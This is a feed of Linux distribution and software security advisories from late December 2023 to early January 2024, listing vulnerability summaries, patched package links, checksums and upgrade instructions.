22.12.2023 02:00:00	gentoo	[GLSA-202312-08] LibRaw: Heap Buffer Overflow (high)	A vulnerability has been found in LibRaw where a heap buffer overflow may lead to an application crash.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-08
22.12.2023 02:00:00	gentoo	[GLSA-202312-09] NASM: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in NASM, the worst of which could lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-09
21.12.2023 21:33:30	suse	[SUSE-SU-2023:4957-1] Security update for libcryptopp (moderate)	Security update for libcryptopp	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4957-1
22.12.2023 11:44:51	almalinux	[ALSA-2023:7879] opensc security update (moderate)	opensc security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7879
22.12.2023 11:34:57	almalinux	[ALSA-2023:7790] postgresql:10 security update (important)	postgresql:10 security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7790
22.12.2023 11:57:58	almalinux	[ALSA-2023:7785] postgresql:15 security update (important)	postgresql:15 security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7785
23.12.2023 04:53:12	slackware	[SSA:2023-356-01] postfix	New postfix packages are available for Slackware 15.0 and -current tofix a security issue.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/postfix-3.6.13-i586-1_slack15.0.txz: Upgraded. Security: this release adds support to defend against an email spoofing attack (SMTP smuggling) on recipients at a Postfix server. Sites concerned about SMTP smuggling attacks should enable this feature on Internet-facing Postfix servers. For compatibility with non-standard clients, Postfix by default excludes clients in mynetworks from this countermeasure. The recommended settings are: # Optionally disconnect remote SMTP clients that send bare newlines, # but allow local clients with non-standard SMTP implementations # such as netcat, fax machines, or load balancer health checks. # smtpd_forbid_bare_newline = yes smtpd_forbid_bare_newline_exclusions = $mynetworks The smtpd_forbid_bare_newline feature is disabled by default. For more information, see: https://www.postfix.org/smtp-smuggling.html (* Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated package for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/postfix-3.6.13-i586-1_slack15.0.txzUpdated package for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/postfix-3.6.13-x86_64-1_slack15.0.txzUpdated package for Slackware -current:ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/postfix-3.8.4-i586-1.txzUpdated package for Slackware x86_64 -current:ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/postfix-3.8.4-x86_64-1.txzMD5 signaturesSlackware 15.0 package:1d5c7eec8f39a89e957abf39a1e79560 postfix-3.6.13-i586-1_slack15.0.txzSlackware x86_64 15.0 package:7286fabbc87a7dfdcc2b1ab4c6c2f4f5 postfix-3.6.13-x86_64-1_slack15.0.txzSlackware -current package:27f27ac76a52652599dc7b7d885fa4e1 n/postfix-3.8.4-i586-1.txzSlackware x86_64 -current package:c49061c599d2667dbea79227b8e6bb18 n/postfix-3.8.4-x86_64-1.txzInstallation instructions*Upgrade the package as root:`# upgradepkg postfix-3.6.13-i586-1_slack15.0.txz`Restart the postfix server:`# /etc/rc.d/rc.postfix restart`	https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-356-01
23.12.2023 02:00:00	gentoo	[GLSA-202312-12] Flatpak: Multiple Vulnerabilities (high)	Several vulnerabilities have been found in Flatpack, the worst of which lead to privilege escalation and sandbox escape.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-12
23.12.2023 02:00:00	gentoo	[GLSA-202312-10] Ceph: Root Privilege Escalation (high)	A vulnerability has been found in Ceph which can lead to root privilege escalation.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-10
23.12.2023 02:00:00	gentoo	[GLSA-202312-11] SABnzbd: Remote Code Execution (high)	A vulnerability has been found in SABnzbd which allows for remote code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-11
23.12.2023 02:00:00	gentoo	[GLSA-202312-13] Gitea: Multiple Vulnerabilities (low)	Multiple vulnerabilities have been discovered in Gitea, the worst of which could result in information leakage.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-13
23.12.2023 02:00:00	gentoo	[GLSA-202312-14] FFmpeg: Multiple Vulnerabilities (high)	Multiple vulnerabilitiies have been discovered in FFmpeg, the worst of which could lead to code execution	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-14
22.12.2023 17:33:47	suse	[SUSE-SU-2023:4965-1] Security update for ppp (moderate)	Security update for ppp	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4965-1
22.12.2023 12:03:43	suse	[SUSE-SU-2023:4961-1] Security update for ppp (moderate)	Security update for ppp	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4961-1
26.12.2023 02:24:31	slackware	[SSA:2023-359-01] Slackware 15.0 kernel	New kernel packages are available for Slackware 15.0 to fix bugs and securityissues.Here are the details from the Slackware 15.0 ChangeLog```patches/packages/linux-5.15.145/: Upgraded. These updates fix various bugs and security issues. Thanks to jwoithe for the PCI fix! Be sure to upgrade your initrd after upgrading the kernel packages. If you use lilo to boot your machine, be sure lilo.conf points to the correct kernel and initrd and run lilo as root to update the bootloader. If you use elilo to boot your machine, you should run eliloconfig to copy the kernel and initrd to the EFI System Partition. For more information, see: Fixed in 5.15.140: https://www.cve.org/CVERecord?id=CVE-2023-46862 Fixed in 5.15.141: https://www.cve.org/CVERecord?id=CVE-2023-6121 ( Security fix )```Where to find the new packagesThanks to the friendly folks at the OSU Open Source Lab(http://osuosl.org) for donating FTP and rsync hostingto the Slackware project! :-)Also see the "Get Slack" section on http://slackware.com foradditional mirror sites near you.Updated packages for Slackware 15.0:ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.145/kernel-generic-5.15.145-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.145/kernel-generic-smp-5.15.145_smp-i686-1.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.145/kernel-headers-5.15.145_smp-x86-1.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.145/kernel-huge-5.15.145-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.145/kernel-huge-smp-5.15.145_smp-i686-1.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.145/kernel-modules-5.15.145-i586-1.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.145/kernel-modules-smp-5.15.145_smp-i686-1.txzftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.145/kernel-source-5.15.145_smp-noarch-1.txzUpdated packages for Slackware x86_64 15.0:ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.145/kernel-generic-5.15.145-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.145/kernel-headers-5.15.145-x86-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.145/kernel-huge-5.15.145-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.145/kernel-modules-5.15.145-x86_64-1.txzftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.145/kernel-source-5.15.145-noarch-1.txzMD5 signaturesSlackware 15.0 packages:993d69a60c60ec423daa5a3791382b65 kernel-generic-5.15.145-i586-1.txz55c5ba0202ebae9633ec5d8dd5bcd035 kernel-generic-smp-5.15.145_smp-i686-1.txzfa28c9e9869c2eb54c57163fa8421717 kernel-headers-5.15.145_smp-x86-1.txzf60c9ba6cae50da0626b6c3b111e592a kernel-huge-5.15.145-i586-1.txzfd1d19f409ac0ed496d175811c0fbc55 kernel-huge-smp-5.15.145_smp-i686-1.txzce5adb250a52a5b0a1ab9fa5cca83ac6 kernel-modules-5.15.145-i586-1.txz44bcc4f2b5256bff442efa147ab8621d kernel-modules-smp-5.15.145_smp-i686-1.txzb896f78655e83e4ff8d62b2e3102fdc1 kernel-source-5.15.145_smp-noarch-1.txzSlackware x86_64 15.0 packages:ca4ca32bb2da2a98ce57ba1c1c3a409f kernel-generic-5.15.145-x86_64-1.txz5b8d82bcbb19120c009dd5bd40bb5c48 kernel-headers-5.15.145-x86-1.txz258306395ac2400ae7a9d9388a3b0ec7 kernel-huge-5.15.145-x86_64-1.txzf665be1a791e806893f73ef4b64ff465 kernel-modules-5.15.145-x86_64-1.txz478e1eabf7561f36b09d7eb4e3948183 kernel-source-5.15.145-noarch-1.txzInstallation instructionsUpgrade the packages as root:`# upgradepkg kernel-.txz`If you are using an initrd, you'll need to rebuild it.For a 32-bit SMP machine, use this command (substitute the appropriatekernel version if you are not running Slackware 15.0):`# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 5.15.145-smp \| bash`For a 64-bit machine, or a 32-bit uniprocessor machine, use this command(substitute the appropriate kernel version if you are not runningSlackware 15.0):`# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 5.15.145 \| bash`Please note that "uniprocessor" has to do with the kernel you are running,not with the CPU. Most systems should run the SMP kernel (if they can)regardless of the number of cores the CPU has. If you aren't sure whichkernel you are running, run "uname -a". If you see SMP there, you arerunning the SMP kernel and should use the 5.15.145-smp version when runningmkinitrd_command_generator. Note that this is only for 32-bit -- 64-bitsystems should always use 5.15.145 as the version.If you are using lilo or elilo to boot the machine, you'll need to ensurethat the machine is properly prepared before rebooting.If using LILO:By default, lilo.conf contains an image= line that references a symlinkthat always points to the correct kernel. No editing should be requiredunless your machine uses a custom lilo.conf. If that is the case, be surethat the image= line references the correct kernel file. Either way,you'll need to run "lilo" as root to reinstall the boot loader.If using elilo:Ensure that the /boot/vmlinuz symlink is pointing to the kernel you wishto use, and then run eliloconfig to update the EFI System Partition.	https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-359-01
24.12.2023 13:01:00	opensuse	[openSUSE-SU-2023:0413-1] Security update for cppcheck (moderate)	Security update for cppcheck	https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0413-1
25.12.2023 11:42:53	almalinux	[ALSA-2023:7884] postgresql:15 security update (important)	postgresql:15 security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7884
27.12.2023 02:00:00	gentoo	[GLSA-202312-15] Git: Multiple Vulnerabilities (high)	Several vulnerabilities have been found in Git, the worst of which could lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-15
26.12.2023 06:02:37	suse	[SUSE-SU-2023:4974-1] Security update for distribution (moderate)	Security update for distribution	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4974-1
26.12.2023 05:09:58	suse	[SUSE-SU-2023:4972-1] Security update for gstreamer-plugins-bad (important)	Security update for gstreamer-plugins-bad	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4972-1
28.12.2023 02:00:00	gentoo	[GLSA-202312-16] libssh: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in libssh, the worst of which could lead to code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-16
28.12.2023 02:00:00	gentoo	[GLSA-202312-17] OpenSSH: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in OpenSSH, the worst of which could lead to code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-17
27.12.2023 23:40:25	opensuse	[openSUSE-SU-2023:0419-1] Security update for zabbix (important)	Security update for zabbix	https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0419-1
27.12.2023 23:40:21	opensuse	[openSUSE-SU-2023:0418-1] Security update for zabbix (important)	Security update for zabbix	https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0418-1
27.12.2023 17:33:47	suse	[SUSE-SU-2023:4980-1] Security update for gstreamer (important)	Security update for gstreamer	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4980-1
27.12.2023 15:33:40	suse	[SUSE-SU-2023:4978-1] Security update for webkit2gtk3 (important)	Security update for webkit2gtk3	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4978-1
28.12.2023 14:52:03	rubysec	[RUBYSEC:ACTIVEADMIN-2023-51763] ActiveAdmin vulnerable to CSV injection (high)	csv_builder.rb in ActiveAdmin (aka Active Admin)before 3.2.0 allows CSV injection.	https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:ACTIVEADMIN-2023-51763
28.12.2023 17:06:57	suse	[SUSE-SU-2023:4988-1] Security update for python-pip (low)	Security update for python-pip	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4988-1
28.12.2023 17:06:28	suse	[SUSE-SU-2023:4987-1] Security update for python-pip (low)	Security update for python-pip	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4987-1
28.12.2023 17:06:09	suse	[SUSE-SU-2023:4986-1] Security update for gnutls (moderate)	Security update for gnutls	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4986-1
28.12.2023 16:38:44	suse	[SUSE-SU-2023:4984-1] Security update for libreoffice (important)	Security update for libreoffice	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4984-1
28.12.2023 15:22:03	suse	[SUSE-SU-2023:4983-1] Security update for gnutls (moderate)	Security update for gnutls	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4983-1
28.12.2023 15:16:05	suse	[SUSE-SU-2023:4982-1] Security update for gstreamer (important)	Security update for gstreamer	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4982-1
30.12.2023 16:24:56	opensuse	[openSUSE-SU-2023:0424-1] Security update for deepin-compressor (moderate)	Security update for deepin-compressor	https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0424-1
30.12.2023 16:24:53	opensuse	[openSUSE-SU-2023:0423-1] Security update for deepin-compressor (moderate)	Security update for deepin-compressor	https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0423-1
30.12.2023 16:24:43	opensuse	[openSUSE-SU-2023:0421-1] Security update for proftpd (important)	Security update for proftpd	https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0421-1
02.01.2024 11:28:23	ubuntu	[USN-6563-1] Thunderbird vulnerabilities	Several security issues were fixed in Thunderbird.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6563-1
02.01.2024 05:25:53	ubuntu	[USN-6562-1] Firefox vulnerabilities	Several security issues were fixed in Firefox.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6562-1
02.01.2024 02:00:00	gentoo	[GLSA-202401-01] Joblib: Arbitrary Code Execution (high)	A vulnerability has been found in Joblib which allows for arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202401-01
01.01.2024 13:01:07	opensuse	[openSUSE-SU-2024:0002-1] Security update for opera (important)	Security update for opera	https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2024:0002-1
01.01.2024 13:01:03	opensuse	[openSUSE-SU-2024:0001-1] Security update for opera (important)	Security update for opera	https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2024:0001-1
03.01.2024 20:09:00	ubuntu	[USN-6566-1] SQLite vulnerabilities	Several security issues were fixed in SQLite.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6566-1
03.01.2024 20:00:01	ubuntu	[USN-6565-1] OpenSSH vulnerabilities	Several security issues were fixed in OpenSSH.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6565-1
03.01.2024 19:15:11	alpinelinux	[ALPINE:CVE-2023-6004] libssh vulnerability	[From CVE-2023-6004] A flaw was found in libssh. By utilizing the ProxyCommand or ProxyJump feature, users can exploit unchecked hostname syntax on the client. This issue may allow an attacker to inject malicious code into the command of the features mentioned through the hostname parameter.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-6004
03.01.2024 11:31:07	ubuntu	[USN-6564-1] Node.js vulnerabilities	Several security issues were fixed in Node.js.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6564-1
03.01.2024 02:00:00	cpan	[CPANSA-Spreadsheet-ParseXLSX-2024-01] Spreadsheet-ParseXLSX vulnerability	ParseXLSX also handles with merged cells, but the memoize implementation allows attacker to allocate an arbitrary memory size.	https://secdb.nttzen.cloud/security-advisory/detail/CPANSA-Spreadsheet-ParseXLSX-2024-01
02.01.2024 19:51:48	suse	[SUSE-SU-2024:0014-1] Security update for w3m (moderate)	Security update for w3m	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2024:0014-1
02.01.2024 17:14:17	suse	[SUSE-SU-2024:0012-1] Security update for postfix (important)	Security update for postfix	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2024:0012-1
02.01.2024 14:21:20	suse	[SUSE-SU-2024:0010-1] Security update for polkit (moderate)	Security update for polkit	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2024:0010-1
02.01.2024 11:41:25	suse	[SUSE-SU-2024:0006-1] Security update for libssh2_org (moderate)	Security update for libssh2_org	https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2024:0006-1
03.01.2024 22:12:53	opensuse	[openSUSE-SU-2024:0008-1] Security update for proftpd (important)	Security update for proftpd	https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2024:0008-1
03.01.2024 22:12:49	opensuse	[openSUSE-SU-2024:0007-1] Security update for exim (important)	Security update for exim	https://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2024:0007-1
04.01.2024 17:11:58	rubysec	[RUBYSEC:OMNIAUTH-MICROSOFT_GRAPH-2024-21632] Omniauth::MicrosoftGraph Account takeover (nOAuth) (high)	### SummaryThe implementation did not validate the legitimacy of the `email`attribute of the user nor did it give/document an option to do so,making it susceptible to [nOAuth](https://www.descope.com/blog/post/noauth)misconfiguration in cases when the `email` is used as a trusteduser identifier	https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:OMNIAUTH-MICROSOFT_GRAPH-2024-21632
04.01.2024 16:24:24	almalinux	[ALSA-2024:0018] tigervnc security update (important)	tigervnc security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2024:0018
04.01.2024 16:29:24	almalinux	[ALSA-2024:0012] firefox security update (important)	firefox security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2024:0012
04.01.2024 16:33:51	almalinux	[ALSA-2024:0003] thunderbird security update (important)	thunderbird security update	https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2024:0003
05.01.2024 19:15:11	alpinelinux	[ALPINE:CVE-2023-46835] xen vulnerability	[From CVE-2023-46835] The current setup of the quarantine page tables assumes that thequarantine domain (dom_io) has been initialized with an address widthof DEFAULT_DOMAIN_ADDRESS_WIDTH (48) and hence 4 page table levels.However dom_io being a PV domain gets the AMD-Vi IOMMU page tableslevels based on the maximum (hot pluggable) RAM address, and hence onsystems with no RAM above the 512GB mark only 3 page-table levels areconfigured in the IOMMU.On systems without RAM above the 512GB boundaryamd_iommu_quarantine_init() will setup page tables for the scratchpage with 4 levels, while the IOMMU will be configured to use 3 levelsonly, resulting in the last page table directory (PDE) effectivelybecoming a page table entry (PTE), and hence a device in quarantinemode gaining write access to the page destined to be a PDE.Due to this page table level mismatch, the sink page the device getsread/write access to is no longer cleared between device assignment,possibly leading to data leaks.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-46835
05.01.2024 19:15:11	alpinelinux	[ALPINE:CVE-2023-46836] xen vulnerability	[From CVE-2023-46836] The fixes for XSA-422 (Branch Type Confusion) and XSA-434 (SpeculativeReturn Stack Overflow) are not IRQ-safe. It was believed that themitigations always operated in contexts with IRQs disabled.However, the original XSA-254 fix for Meltdown (XPTI) deliberately leftinterrupts enabled on two entry paths; one unconditionally, and oneconditionally on whether XPTI was active.As BTC/SRSO and Meltdown affect different CPU vendors, the mitigationsare not active together by default. Therefore, there is a racecondition whereby a malicious PV guest can bypass BTC/SRSO protectionsand launch a BTC/SRSO attack against Xen.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-46836
05.01.2024 19:15:11	alpinelinux	[ALPINE:CVE-2023-46837] xen vulnerability	[From CVE-2023-46837] Arm provides multiple helpers to clean & invalidate the cachefor a given region. This is, for instance, used when allocatingguest memory to ensure any writes (such as the ones during scrubbing)have reached memory before handing over the page to a guest.Unfortunately, the arithmetics in the helpers can overflow and wouldthen result to skip the cache cleaning/invalidation. Therefore thereis no guarantee when all the writes will reach the memory.This undefined behavior was meant to be addressed by XSA-437, but theapproach was not sufficient.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-46837
05.01.2024 19:15:08	alpinelinux	[ALPINE:CVE-2023-34321] xen vulnerability	[From CVE-2023-34321] Arm provides multiple helpers to clean & invalidate the cachefor a given region. This is, for instance, used when allocatingguest memory to ensure any writes (such as the ones during scrubbing)have reached memory before handing over the page to a guest.Unfortunately, the arithmetics in the helpers can overflow and wouldthen result to skip the cache cleaning/invalidation. Therefore thereis no guarantee when all the writes will reach the memory.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-34321
05.01.2024 19:15:08	alpinelinux	[ALPINE:CVE-2023-34322] xen vulnerability	[From CVE-2023-34322] For migration as well as to work around kernels unaware of L1TF (seeXSA-273), PV guests may be run in shadow paging mode. Since Xen itselfneeds to be mapped when PV guests run, Xen and shadowed PV guests rundirectly the respective shadow page tables. For 64-bit PV guests thismeans running on the shadow of the guest root page table.In the course of dealing with shortage of memory in the shadow poolassociated with a domain, shadows of page tables may be torn down. Thistearing down may include the shadow root page table that the CPU inquestion is presently running on. While a precaution exists tosupposedly prevent the tearing down of the underlying live page table,the time window covered by that precaution isn't large enough.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-34322
05.01.2024 19:15:08	alpinelinux	[ALPINE:CVE-2023-34323] xen vulnerability	[From CVE-2023-34323] When a transaction is committed, C Xenstored will first checkthe quota is correct before attempting to commit any nodes. It wouldbe possible that accounting is temporarily negative if a node hasbeen removed outside of the transaction.Unfortunately, some versions of C Xenstored are assuming that thequota cannot be negative and are using assert() to confirm it. Thiswill lead to C Xenstored crash when tools are built without -DNDEBUG(this is the default).	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-34323
05.01.2024 19:15:08	alpinelinux	[ALPINE:CVE-2023-34325] xen vulnerability	[From CVE-2023-34325] [This CNA information record relates to multiple CVEs; thetext explains which aspects/vulnerabilities correspond to which CVE.]libfsimage contains parsing code for several filesystems, most of them based ongrub-legacy code. libfsimage is used by pygrub to inspect guest disks.Pygrub runs as the same user as the toolstack (root in a priviledged domain).At least one issue has been reported to the Xen Security Team that allows anattacker to trigger a stack buffer overflow in libfsimage. After furtheranalisys the Xen Security Team is no longer confident in the suitability oflibfsimage when run against guest controlled input with super user priviledges.In order to not affect current deployments that rely on pygrub patches areprovided in the resolution section of the advisory that allow running pygrub indeprivileged mode.CVE-2023-4949 refers to the original issue in the upstream grubproject ("An attacker with local access to a system (either through adisk or external drive) can present a modified XFS partition togrub-legacy in such a way to exploit a memory corruption in grub’s XFSfile system implementation.") CVE-2023-34325 refers specifically tothe vulnerabilities in Xen's copy of libfsimage, which is decendedfrom a very old version of grub.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-34325
05.01.2024 19:15:08	alpinelinux	[ALPINE:CVE-2023-34326] xen vulnerability	[From CVE-2023-34326] The caching invalidation guidelines from the AMD-Vi specification (48882—Rev3.07-PUB—Oct 2022) is incorrect on some hardware, as devices will malfunction(see stale DMA mappings) if some fields of the DTE are updated but the IOMMUTLB is not flushed.Such stale DMA mappings can point to memory ranges not owned by the guest, thusallowing access to unindented memory regions.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-34326
05.01.2024 19:15:08	alpinelinux	[ALPINE:CVE-2023-34327] xen vulnerability	[From CVE-2023-34327] [This CNA information record relates to multiple CVEs; thetext explains which aspects/vulnerabilities correspond to which CVE.]AMD CPUs since ~2014 have extensions to normal x86 debugging functionality.Xen supports guests using these extensions.Unfortunately there are errors in Xen's handling of the guest state, leadingto denials of service. 1) CVE-2023-34327 - An HVM vCPU can end up operating in the context of a previous vCPUs debug mask state. 2) CVE-2023-34328 - A PV vCPU can place a breakpoint over the live GDT. This allows the PV vCPU to exploit XSA-156 / CVE-2015-8104 and lock up the CPU entirely.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-34327
05.01.2024 19:15:08	alpinelinux	[ALPINE:CVE-2023-34328] xen vulnerability	[From CVE-2023-34328] [This CNA information record relates to multiple CVEs; thetext explains which aspects/vulnerabilities correspond to which CVE.]AMD CPUs since ~2014 have extensions to normal x86 debugging functionality.Xen supports guests using these extensions.Unfortunately there are errors in Xen's handling of the guest state, leadingto denials of service. 1) CVE-2023-34327 - An HVM vCPU can end up operating in the context of a previous vCPUs debug mask state. 2) CVE-2023-34328 - A PV vCPU can place a breakpoint over the live GDT. This allows the PV vCPU to exploit XSA-156 / CVE-2015-8104 and lock up the CPU entirely.	https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-34328
05.01.2024 19:08:32	msrc	[MS:CVE-2024-0225] Chromium: CVE-2024-0225 Use after free in WebGPU		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2024-0225
05.01.2024 19:08:30	msrc	[MS:CVE-2024-0224] Chromium: CVE-2024-0224 Use after free in WebAudio		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2024-0224
05.01.2024 19:08:28	msrc	[MS:CVE-2024-0223] Chromium: CVE-2024-0223 Heap buffer overflow in ANGLE		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2024-0223
05.01.2024 19:08:23	msrc	[MS:CVE-2024-0222] Chromium: CVE-2024-0222 Use after free in ANGLE		https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2024-0222
05.01.2024 15:25:40	ubuntu	[USN-6549-4] Linux kernel (Intel IoTG) vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/detail/USN-6549-4
05.01.2024 02:00:00	gentoo	[GLSA-202401-02] c-ares: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been found in c-ares, the worst of which could result in the loss of confidentiality or integrity.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202401-02
05.01.2024 02:00:00	gentoo	[GLSA-202401-03] BlueZ: Privilege Escalation (high)	Multiple vulnerabilities have been discovered in Bluez, the worst of which can lead to privilege escalation.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202401-03
05.01.2024 02:00:00	gentoo	[GLSA-202401-04] WebKitGTK+: Multiple Vulnerabilities (high)	Several vulnerabilities have been found in WebKitGTK+, the worst of which can lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202401-04
05.01.2024 02:00:00	gentoo	[GLSA-202401-05] RDoc: Command Injection (normal)	A vulnerability has been found in RDoc which allows for command injection.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202401-05
05.01.2024 02:00:00	gentoo	[GLSA-202401-06] CUPS filters: Remote Code Execution (high)	A vulnerability has been found in CUPS filters where remote code execution is possible via the beh filter.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202401-06
05.01.2024 17:22:32	rubysec	[RUBYSEC:VIEW_COMPONENT-2024-21636] view_component Cross-site Scripting vulnerability (medium)	### Impact_What kind of vulnerability is it? Who is impacted?_This is an XSS vulnerability that has the potential to impactanyone rendering a component directly from a controller with theview_component gem. Note that only components that define a[`#call` method](https://viewcomponent.org/guide/templates.html#call)(i.e. instead of using a sidecar template) are affected. The returnvalue of the `#call` method is not sanitized and can includeuser-defined content.In addition, the return value of the[`#output_postamble` method](https://viewcomponent.org/api.html#output_postamble--string)is not sanitized, which can also lead to XSS issues.### Patches_Has the problem been patched? What versions should users upgrade to?_Versions 3.9.0 has been released and fully mitigates both the`#call` and the `#output_postamble` vulnerabilities.### Workarounds_Is there a way for users to fix or remediate the vulnerabilitywithout upgrading?_Sanitize the return value of `#call`, eg:```rubyclass MyComponent < ApplicationComponent def call html_escape("<div>#{user_input}</div>") endend```### References_Are there any links users can visit to find out more?_https://github.com/ViewComponent/view_component/pull/1950### For more informationIf you have any questions or comments about this advisory:Open an issue in the[github/view_component](https://github.com/github/view_component) project.	https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:VIEW_COMPONENT-2024-21636
06.01.2024 02:00:00	gentoo	[GLSA-202401-07] R: Directory Traversal (normal)	A vulnerability was found in R which could allow for remote code execution.	https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202401-07
08.01.2024 02:00:00	cisa	[CISA-2024:0108] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (critical)	CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0108
08.01.2024 15:54:39	almalinux	[ALSA-2024:0071] squid security update (important)	squid security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0071
